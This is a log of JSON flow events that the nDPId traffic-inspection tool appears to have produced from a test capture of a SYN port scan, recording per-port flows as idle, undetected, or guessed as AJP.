-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 